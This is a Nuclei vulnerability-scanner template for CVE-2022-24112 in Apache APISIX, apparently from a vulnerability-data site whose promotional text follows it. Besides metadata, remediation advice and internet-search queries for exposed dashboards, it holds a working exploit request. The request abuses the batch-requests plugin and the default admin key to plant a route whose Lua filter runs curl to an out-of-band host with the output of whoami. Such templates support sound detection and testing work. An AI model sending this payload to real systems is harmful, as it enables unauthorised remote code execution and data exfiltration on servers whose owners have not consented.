id: CVE-2022-24112
info:
name: Apache APISIX - Remote Code Execution
author: Mr-xn
severity: critical
description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
reference:
- https://www.openwall.com/lists/oss-security/2022/02/11/3
- https://twitter.com/sirifu4k1/status/1496043663704858625
- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
- https://nvd.nist.gov/vuln/detail/CVE-2022-24112
- http://www.openwall.com/lists/oss-security/2022/02/11/3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24112
cwe-id: CWE-290
epss-score: 0.96182
epss-percentile: 0.9987
cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: apisix
shodan-query:
- title:"Apache APISIX Dashboard"
- http.title:"apache apisix dashboard"
fofa-query:
- title="Apache APISIX Dashboard"
- title="apache apisix dashboard"
google-query: intitle:"apache apisix dashboard"
tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev,vuln
http:
- raw:
- |
POST /apisix/batch-requests HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
{
"headers":{
"X-Real-IP":"127.0.0.1",
"Content-Type":"application/json"
},
"timeout":1500,
"pipeline":[
{
"method":"PUT",
"path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
"body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}"
}
]
}
- |
GET /api/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '"reason":"OK"'
- '"status":200'
condition: and
- type: word
part: interactsh_protocol
words:
- http
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- GET \/([a-z-]+) HTTP
part: interactsh_request
# digest: 4a0a00473045022037c63f1eae883e4e4e90ddf7d03afd2d146aca85c10e3fa9d633dd9434ee356d022100db2c0fc6a6d7e6215a7a854df47960e36f71663716ec559cfcaa213624a1c8f6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation